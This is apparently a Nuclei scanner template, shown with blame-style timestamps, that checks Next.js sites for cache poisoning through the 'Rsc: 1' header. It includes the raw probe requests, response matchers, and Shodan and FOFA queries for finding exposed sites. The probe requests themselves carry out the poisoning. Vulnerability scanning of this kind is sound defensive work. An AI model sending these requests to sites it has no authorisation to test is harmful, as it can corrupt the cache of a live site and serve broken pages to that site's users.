2024-07-10 10:25:48 +00:00
|
|
|
id: nextjs-rsc-cache
|
|
|
|
|
|
|
|
info:
|
2024-07-10 18:09:17 +00:00
|
|
|
name: Next.js - Cache Poisoning
|
2024-07-10 10:25:48 +00:00
|
|
|
author: DhiyaneshDk
|
|
|
|
severity: high
|
2024-07-10 18:12:57 +00:00
|
|
|
description: |
|
|
|
|
Next.js is vulnerable to Cache Poisoning using RSC.
|
2024-07-10 10:25:48 +00:00
|
|
|
reference:
|
|
|
|
- https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole
|
|
|
|
metadata:
|
|
|
|
verified: true
|
|
|
|
vendor: vercel
|
|
|
|
product: next.js
|
|
|
|
framework: node.js
|
|
|
|
shodan-query:
|
|
|
|
- http.html:"/_next/static"
|
|
|
|
- cpe:"cpe:2.3:a:zeit:next.js"
|
|
|
|
fofa-query: body="/_next/static"
|
2024-07-10 18:09:17 +00:00
|
|
|
tags: nextjs,cache
|
2024-07-10 10:25:48 +00:00
|
|
|
|
|
|
|
variables:
|
|
|
|
rand: "{{rand_text_numeric(5)}}"
|
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
GET /?cb={{rand}} HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Priority: u=1
|
|
|
|
Rsc: 1
|
2024-07-10 10:30:05 +00:00
|
|
|
|
2024-07-10 10:25:48 +00:00
|
|
|
- |
|
2024-07-10 18:09:17 +00:00
|
|
|
@timeout: 10s
|
2024-07-10 10:25:48 +00:00
|
|
|
GET /?cb={{rand}} HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Priority: u=1
|
|
|
|
Rsc: 1
|
|
|
|
|
|
|
|
- |
|
2024-07-10 18:09:17 +00:00
|
|
|
@timeout: 10s
|
2024-07-10 10:25:48 +00:00
|
|
|
GET /?cb={{rand}} HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- "status_code_2 == 200 && contains(content_type_2, 'text/x-component')"
|
|
|
|
- "status_code_3 == 200 && contains(content_type_3, 'text/x-component')"
|
|
|
|
condition: and
|